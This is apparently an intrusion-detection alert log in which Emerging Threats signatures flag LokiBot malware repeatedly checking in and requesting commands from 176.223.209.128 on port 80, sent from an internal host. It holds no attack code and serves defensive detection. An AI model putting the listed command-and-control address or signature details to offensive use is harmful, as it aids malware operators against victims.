                                              11/25/21-10:52:13.677236TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032380192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2025381ET TROJAN LokiBot Checkin5032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.189707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032480192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2025381ET TROJAN LokiBot Checkin5032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:14.713650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032580192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2025381ET TROJAN LokiBot Checkin5032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.234438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032680192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2025381ET TROJAN LokiBot Checkin5032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:15.707321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032780192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2025381ET TROJAN LokiBot Checkin5032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.204603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032880192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2025381ET TROJAN LokiBot Checkin5032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:16.719602TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25032980192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033080192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033080192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2025381ET TROJAN LokiBot Checkin5033080192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.227829TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033080192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.758848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.758848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.758848TCP2025381ET TROJAN LokiBot Checkin5033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:17.758848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033180192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2025381ET TROJAN LokiBot Checkin5033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.265321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033280192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2025381ET TROJAN LokiBot Checkin5033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:18.757231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033380192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2025381ET TROJAN LokiBot Checkin5033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.260157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033480192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2025381ET TROJAN LokiBot Checkin5033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:19.780978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033580192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2025381ET TROJAN LokiBot Checkin5033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.285330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033680192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2025381ET TROJAN LokiBot Checkin5033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:20.716730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033780192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2025381ET TROJAN LokiBot Checkin5033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.237790TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033880192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2025381ET TROJAN LokiBot Checkin5033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:21.714998TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25033980192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2025381ET TROJAN LokiBot Checkin5034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.226975TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034080192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2025381ET TROJAN LokiBot Checkin5034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:22.744389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034180192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2025381ET TROJAN LokiBot Checkin5034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.270426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034280192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2025381ET TROJAN LokiBot Checkin5034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:23.770525TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034380192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2025381ET TROJAN LokiBot Checkin5034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.270030TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034480192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2025381ET TROJAN LokiBot Checkin5034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:24.703353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034580192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2025381ET TROJAN LokiBot Checkin5034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.197758TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034680192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2025381ET TROJAN LokiBot Checkin5034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:25.690005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034780192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2025381ET TROJAN LokiBot Checkin5034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.225157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034880192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2025381ET TROJAN LokiBot Checkin5034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:26.744009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25034980192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2025381ET TROJAN LokiBot Checkin5035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.252180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035080192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2025381ET TROJAN LokiBot Checkin5035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:27.764927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035180192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2025381ET TROJAN LokiBot Checkin5035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.263374TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035280192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2025381ET TROJAN LokiBot Checkin5035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:28.747393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035380192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2025381ET TROJAN LokiBot Checkin5035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.178594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035480192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2025381ET TROJAN LokiBot Checkin5035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:29.689703TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035580192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2025381ET TROJAN LokiBot Checkin5035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.160809TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035680192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2025381ET TROJAN LokiBot Checkin5035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:30.684075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035780192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2025381ET TROJAN LokiBot Checkin5035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.132269TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035880192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2025381ET TROJAN LokiBot Checkin5035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:31.643581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25035980192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2025381ET TROJAN LokiBot Checkin5036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.168793TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036080192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2025381ET TROJAN LokiBot Checkin5036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:32.703571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036180192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2025381ET TROJAN LokiBot Checkin5036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.165058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036280192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2025381ET TROJAN LokiBot Checkin5036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:33.675960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036380192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2025381ET TROJAN LokiBot Checkin5036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.188796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036480192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2025381ET TROJAN LokiBot Checkin5036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:34.702326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036580192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2025381ET TROJAN LokiBot Checkin5036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.210581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036680192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2025381ET TROJAN LokiBot Checkin5036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:35.688599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036780192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2025381ET TROJAN LokiBot Checkin5036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.166352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036880192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2025381ET TROJAN LokiBot Checkin5036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:36.667414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25036980192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2025381ET TROJAN LokiBot Checkin5037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.177630TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037080192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2025381ET TROJAN LokiBot Checkin5037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:37.684362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037180192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2025381ET TROJAN LokiBot Checkin5037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.201110TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037280192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2025381ET TROJAN LokiBot Checkin5037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:38.676993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037380192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2025381ET TROJAN LokiBot Checkin5037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.142414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037480192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2025381ET TROJAN LokiBot Checkin5037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:39.619722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037580192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2025381ET TROJAN LokiBot Checkin5037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.167312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037680192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2025381ET TROJAN LokiBot Checkin5037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:40.668286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037780192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2025381ET TROJAN LokiBot Checkin5037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.168892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037880192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2025381ET TROJAN LokiBot Checkin5037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:41.613994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25037980192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2025381ET TROJAN LokiBot Checkin5038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.127400TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038080192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15038180192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5038180192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2025381ET TROJAN LokiBot Checkin5038180192.168.11.20176.223.209.128
                                              11/25/21-10:52:42.627468TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25038180192.168.11.20176.223.209.128
